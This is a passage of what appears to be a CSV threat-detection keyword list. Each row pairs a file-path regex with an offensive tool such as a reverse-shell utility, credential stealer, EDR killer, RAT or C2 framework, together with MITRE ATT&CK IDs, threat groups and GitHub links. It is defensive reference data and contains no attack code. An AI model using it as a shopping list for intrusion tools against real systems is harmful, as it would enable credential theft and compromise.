protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\CrossC2.*",".{0,1000}\\CrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*\CROSSNET\CROSSNET\*",".{0,1000}\\CROSSNET\\CROSSNET\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","0","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*\cryptolok*",".{0,1000}\\cryptolok.{0,1000}","offensive_tool_keyword","Github Username","redteam tools github repo ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/cryptolok","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\CScrandle_fileless.cs*",".{0,1000}\\CScrandle_fileless\.cs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\CsOnTheFly.ps1*",".{0,1000}\\CsOnTheFly\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - 
T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\cstealer.py*",".{0,1000}\\cstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*\ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1897","287","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z" "*\CultesDesGoules.txt*",".{0,1000}\\CultesDesGoules\.txt.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\curlshell.py*",".{0,1000}\\curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" 
"*\curlshell-main*",".{0,1000}\\curlshell\-main.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*\curlshell-main\*",".{0,1000}\\curlshell\-main\\.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*\CurrentVersion\Run\XenoUpdateManager*",".{0,1000}\\CurrentVersion\\Run\\XenoUpdateManager.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\CustomEncoding.cpp*",".{0,1000}\\CustomEncoding\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\D1rkInject\*",".{0,1000}\\D1rkInject\\.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*\dacledit-*.bak*",".{0,1000}\\dacledit\-.{0,1000}\.bak.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\dacledit.py*",".{0,1000}\\dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\daclread.py*",".{0,1000}\\daclread\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\dangerousACL_Computer.txt*",".{0,1000}\\dangerousACL_Computer\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\dangerousACL_Groups.txt*",".{0,1000}\\dangerousACL_Groups\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\darkexe.py*",".{0,1000}\\darkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*\DarkLoadLibrary.*",".{0,1000}\\DarkLoadLibrary\..{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","10","10","990","199","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*\Darkside.exe*",".{0,1000}\\Darkside\.exe.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*\Darkside.sln*",".{0,1000}\\Darkside\.sln.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*\DarkWidow\src\*",".{0,1000}\\DarkWidow\\src\\.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" 
"*\dashlane\getCredsdashlaneEntries.h*",".{0,1000}\\dashlane\\getCredsdashlaneEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\dashlane\getCredsdashlaneMaster.h*",".{0,1000}\\dashlane\\getCredsdashlaneMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\Data\WinAuditDB.mdb*",".{0,1000}\\Data\\WinAuditDB\.mdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\dbms\fingerprint.py*",".{0,1000}\\dbms\\fingerprint\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*\dcrypt.exe*",".{0,1000}\\dcrypt\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 
","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\dcrypt.sys*",".{0,1000}\\dcrypt\.sys.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\DCrypt\Bin*",".{0,1000}\\DCrypt\\Bin.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\dcrypt_setup.exe*",".{0,1000}\\dcrypt_setup\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\dcs_weak_kerberos_ciphersuite.txt*",".{0,1000}\\dcs_weak_kerberos_ciphersuite\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\dcshadow.html*",".{0,1000}\\dcshadow\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\ddspoof.py*",".{0,1000}\\ddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*\DDSpoof\networking\*",".{0,1000}\\DDSpoof\\networking\\.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*\DDSpoof\sniffers\*",".{0,1000}\\DDSpoof\\sniffers\\.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*\deadPool.ps1*",".{0,1000}\\deadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" 
"*\DecryptAutoLogon.exe*",".{0,1000}\\DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\decrypted.dmp*",".{0,1000}\\decrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*\DECRYPT-FILES.txt*",".{0,1000}\\DECRYPT\-FILES\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\Defeat-Defender-V1.2.0-main*",".{0,1000}\\Defeat\-Defender\-V1\.2\.0\-main.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\DelegationBOF.*",".{0,1000}\\DelegationBOF\..{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*\DeletePSscriptSignning.bat*",".{0,1000}\\DeletePSscriptSignning\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\DeleteWD.dll*",".{0,1000}\\DeleteWD\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\dementor.py*",".{0,1000}\\dementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining 
NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*\demiguise.py*",".{0,1000}\\demiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*\Demo\VulnApp.exe*",".{0,1000}\\Demo\\VulnApp\.exe.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\demon.dll*",".{0,1000}\\demon\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\demon.x64.bin*",".{0,1000}\\demon\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\demon.x64.exe*",".{0,1000}\\demon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - 
T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\demon1.dll*",".{0,1000}\\demon1\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\demosyscalls.exe*",".{0,1000}\\demosyscalls\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\Dendrobate\*",".{0,1000}\\Dendrobate\\.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.bin*",".{0,1000}\\Dendron\.bin.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.exe*",".{0,1000}\\Dendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.sln*",".{0,1000}\\Dendron\.sln.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\DeployPrinterNightmare.exe*",".{0,1000}\\DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their 